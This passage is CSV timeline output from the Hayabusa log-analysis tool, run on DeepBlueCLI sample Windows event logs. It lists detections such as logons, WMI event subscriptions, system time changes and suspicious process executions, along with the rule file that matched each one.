+09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:32:12.657 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:34:00.063 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:40:48.532 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0xd9c6,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:42:11.390 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:42:11.390 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:42:34.625 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:42:43.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-22 08:42:49.610 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:42:49.610 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:42:49.610 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:43:06.625 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x16559 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x16589 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:43:06.625 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x16559,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:44:23.818 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:44:23.818 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:44:23.849 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:45:01.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-22 08:45:01.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-22 08:45:09.380 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:45:09.380 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:45:09.380 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 09:34:55.380 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 09:37:57.755 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 09:44:32.677 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x16589,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 09:53:07.927 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 10:07:45.896 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 10:13:36.380 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 10:21:57.052 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 10:36:35.927 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 10:38:16.943 +09:00,IE8Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:07:11.015 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:07:11.015 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:07:26.562 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:07:38.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-24 14:07:42.189 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:07:42.189 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:07:42.189 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:08:08.126 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b7c0 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b7f0 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:08:08.126 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x2b7c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:09:50.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-24 14:09:50.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-24 14:11:00.564 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:00.564 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:18:43.547 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:18:43.547 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:18:43.562 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 02:23:49.093 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:25:02.877 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:25:02.877 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:25:02.877 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 02:48:26.739 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:48:26.739 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:48:26.739 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 02:57:33.848 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:57:33.848 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:57:33.848 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 03:01:39.454 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 03:01:39.454 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 03:01:39.454 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 03:02:36.847 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 03:02:36.847 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 03:02:36.847 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 03:05:21.128 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 03:05:40.910 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 03:08:12.894 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:49:55.313 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:49:55.313 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:49:55.313 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:50:49.109 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x2b7f0,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:52:22.343 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:52:22.343 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:52:36.312 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:52:41.000 +09:00,IE8WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 06:52:48.955 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:52:48.955 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:52:48.955 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:54:52.158 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: 